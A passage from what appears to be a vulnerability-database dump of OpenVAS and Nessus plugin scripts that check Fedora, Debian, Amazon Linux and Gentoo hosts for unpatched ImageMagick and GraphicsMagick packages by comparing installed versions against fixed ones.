2014)\");\n script_cve_id(\"CVE-2014-1958\", \"CVE-2014-1947\", \"CVE-2014-2030\");\n script_tag(name:\"cvss_base\", value:\"6.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:S/C:C/I:C/A:C\");\n script_name(\"Fedora Update for ImageMagick FEDORA-2014-4969\");\n\n tag_insight = \"ImageMagick is an image display and manipulation tool for the X\nWindow System. ImageMagick can read and write JPEG, TIFF, PNM, GIF,\nand Photo CD image formats. It can resize, rotate, sharpen, color\nreduce, or add special effects to an image, and when finished you can\neither save the completed work in the original format or a different\none. ImageMagick also includes command line programs for creating\nanimated or transparent .gifs, creating composite images, creating\nthumbnail images, and more.\n\nImageMagick is one of your choices if you need a program to manipulate\nand display images. If you want to develop your own applications\nwhich use ImageMagick code or APIs, you need to install\nImageMagick-devel as well.\n\";\n\n tag_affected = \"ImageMagick on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4969\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131475.html\");\n script_tag(name:\"summary\", value:\"Check for the Version of ImageMagick\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.8.6.3~4.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-06T11:12:23", "bulletinFamily": "scanner", "description": "Several buffer overflows were found in Imagemagick, a suite of image\nmanipulation programs. Processing malformed PSD files could lead to the\nexecution of arbitrary code.", "modified": "2018-04-06T00:00:00", "published": "2014-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702898", "id": "OPENVAS:1361412562310702898", "title": "Debian Security Advisory DSA 2898-1 (imagemagick - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2898.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 2898-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702898\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-1947\", \"CVE-2014-1958\", \"CVE-2014-2030\");\n script_name(\"Debian Security Advisory DSA 2898-1 (imagemagick - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-04-09 00:00:00 +0200 (Wed, 09 Apr 2014)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2898.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"imagemagick on Debian Linux\");\n script_tag(name: \"insight\", value: \"ImageMagick is a software suite to\ncreate, edit, and compose bitmap images. It can read, convert and write images\nin a variety of formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000, PDF,\nPhotoCD, PNG, Postscript, SVG, and TIFF. Use ImageMagick to translate, flip,\nmirror, rotate, scale, shear and transform images, adjust image colors, apply\nvarious special effects, or draw text, lines, polygons, ellipses and Bezier curves.\nAll manipulations can be achieved through shell commands as well as through\nan X11 graphical interface (display).\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (squeeze),\nthese problems have been fixed in version 8:6.6.0.4-3+squeeze4.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 8:6.7.7.10-5+deb7u3.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 8:6.7.7.10+dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 8:6.7.7.10+dfsg-1.\n\nWe recommend that you upgrade your imagemagick packages.\");\n script_tag(name: \"summary\", value: \"Several buffer overflows were found in Imagemagick, a suite of image\nmanipulation programs. Processing malformed PSD files could lead to the\nexecution of arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++3\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore3\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore3-extra\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand3\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++5\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore5\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore5-extra\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand5\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-02T14:32:19", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120052", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120052", "title": "Amazon Linux Local Check: ALAS-2014-336", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-336.nasl 6995 2017-08-23 11:52:03Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120052\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:16:20 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-336\");\n script_tag(name:\"solution\", value:\"Run yum update ImageMagick to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-336.html\");\n script_cve_id(\"CVE-2014-1958\", \"CVE-2014-1947\", \"CVE-2014-2030\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"ImageMagick\", rpm:\"ImageMagick~6.7.8.9~10.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"ImageMagick-c++-devel\", rpm:\"ImageMagick-c++-devel~6.7.8.9~10.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"ImageMagick-devel\", rpm:\"ImageMagick-devel~6.7.8.9~10.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"ImageMagick-debuginfo\", rpm:\"ImageMagick-debuginfo~6.7.8.9~10.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"ImageMagick-doc\", rpm:\"ImageMagick-doc~6.7.8.9~10.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"ImageMagick-c++\", rpm:\"ImageMagick-c++~6.7.8.9~10.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"ImageMagick-perl\", rpm:\"ImageMagick-perl~6.7.8.9~10.15.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-20T16:42:53", "bulletinFamily": "scanner", "description": "Several buffer overflows were found in Imagemagick, a suite of image\nmanipulation programs. Processing malformed PSD files could lead to the\nexecution of arbitrary code.", "modified": "2018-03-19T00:00:00", "published": "2014-04-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=702898", "id": "OPENVAS:702898", "title": "Debian Security Advisory DSA 2898-1 (imagemagick - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2898.nasl 9136 2018-03-19 13:08:02Z cfischer $\n# Auto-generated from advisory DSA 2898-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(702898);\n script_version(\"$Revision: 9136 $\");\n script_cve_id(\"CVE-2014-1947\", \"CVE-2014-1958\", \"CVE-2014-2030\");\n script_name(\"Debian Security Advisory DSA 2898-1 (imagemagick - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-03-19 14:08:02 +0100 (Mon, 19 Mar 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-04-09 00:00:00 +0200 (Wed, 09 Apr 2014)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2898.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"imagemagick on Debian Linux\");\n script_tag(name: \"insight\", value: \"ImageMagick is a software suite to\ncreate, edit, and compose bitmap images. It can read, convert and write images\nin a variety of formats (over 100) including DPX, EXR, GIF, JPEG, JPEG-2000, PDF,\nPhotoCD, PNG, Postscript, SVG, and TIFF. Use ImageMagick to translate, flip,\nmirror, rotate, scale, shear and transform images, adjust image colors, apply\nvarious special effects, or draw text, lines, polygons, ellipses and Bezier curves.\nAll manipulations can be achieved through shell commands as well as through\nan X11 graphical interface (display).\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (squeeze),\nthese problems have been fixed in version 8:6.6.0.4-3+squeeze4.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 8:6.7.7.10-5+deb7u3.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 8:6.7.7.10+dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 8:6.7.7.10+dfsg-1.\n\nWe recommend that you upgrade your imagemagick packages.\");\n script_tag(name: \"summary\", value: \"Several buffer overflows were found in Imagemagick, a suite of image\nmanipulation programs. Processing malformed PSD files could lead to the\nexecution of arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++3\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore3\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore3-extra\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand3\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.6.0.4-3+squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-common\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-dbg\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"imagemagick-doc\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++-dev\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagick++5\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore-dev\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore5\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickcore5-extra\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand-dev\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmagickwand5\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"perlmagick\", ver:\"8:6.7.7.10-5+deb7u3\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-29T12:39:53", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201405-09", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121184", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121184", "title": "Gentoo Security Advisory GLSA 201405-09", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201405-09.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121184\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:09 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201405-09\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in ImageMagick. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201405-09\");\n script_cve_id(\"CVE-2012-1185\", \"CVE-2012-1186\", \"CVE-2012-0247\", \"CVE-2012-0248\", \"CVE-2013-4298\", \"CVE-2014-1947\", \"CVE-2014-2030\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201405-09\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"media-gfx/imagemagick\", unaffected: make_list(\"ge 6.8.8.10\"), vulnerable: make_list(\"lt 6.8.8.10\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:22:20", "bulletinFamily": "scanner", "description": "New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-05T00:00:00", "id": "FEDORA_2014-9596.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77427", "published": "2014-08-29T00:00:00", "title": "Fedora 20 : GraphicsMagick-1.3.20-1.fc20 (2014-9596)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9596.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77427);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2014-1947\");\n script_bugtraq_id(65683);\n script_xref(name:\"FEDORA\", value:\"2014-9596\");\n\n script_name(english:\"Fedora 20 : GraphicsMagick-1.3.20-1.fc20 (2014-9596)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New stable upstream release, patched for CVE-2014-1947. See also:\nhttp://www.graphicsmagick.org/NEWS.html#august-16-2014\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#august-16-2014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1064098\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137120.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a96d0e01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< 